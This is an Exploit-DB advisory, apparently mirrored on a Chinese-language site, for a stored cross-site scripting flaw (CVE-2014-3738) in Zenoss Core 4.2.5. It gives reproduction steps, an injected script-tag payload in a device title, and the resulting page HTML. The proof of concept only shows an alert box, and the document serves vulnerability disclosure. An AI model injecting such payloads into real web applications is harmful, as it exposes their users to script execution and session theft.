Zenoss Monitoring System 4.2.5-2108 (x64) – Persistent Cross-Site Scripting

• Exploit Database
• 16 阅读

• 作者： Dolev Farhi
  日期： 2014-07-25
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/34165/

• # Exploit Title: Stored XSS vulnerability in Zenoss core open source monitoring system
  # Date: 12/05/2014
  # Exploit author: Dolev Farhi dolev(at)openflare.org
  # Vendor homepage: http://zenoss.com
  # Software Link: http://www.zenoss.com
  # Version: Core 4.2.5-2108 64bit
  # Tested on: Kali Linux
  # Vendor alerted: 12/05/2014
  # CVE-2014-3738
  
  Software details:
  
  ==================
  
  Zenoss (Zenoss Core) is a free and open-source application, server, and 
  network management platform based on the Zope application server.
  
  Released under the GNU General Public License (GPL) version 2, Zenoss 
  Core provides a web interface that
  
  allows system administrators to monitor availability, 
  inventory/configuration, performance, and events.
  
  
  
  Vulnerability details: Stored XSS Vulnerability
  
  ========================
  
  A persistent XSS vulnerability was found in Zenoss core, by creating a 
  malicious host with the Title <script>alert("Xss")</script> any user 
  browsing
  
  to the relevant manufacturers page will get a client-side script 
  executed immediately.
  
  
  
  
  
  Proof of Concept:
  1. Create a device with with the Title <script>alert("XSS")</script>
  2. Navigate to theInfrastructure -> Manufacturers page.
  3. pick the name of the manufacturer of the device, e.g. Intel
  4. select the type of the hardware the device is assigned to, e.g. GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz
  5. the XSS Executes.
  
  <tr class="even">
  
   <td class="tablevalues"><a href='https://www.exploit-db.com/zport/dmd/Devices/Server/Linux/devices/localhost/devicedetail'><script>alert("Dolev")</script></a></td>
  
   <td class="tablevalues">GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz</td>
  
  </tr>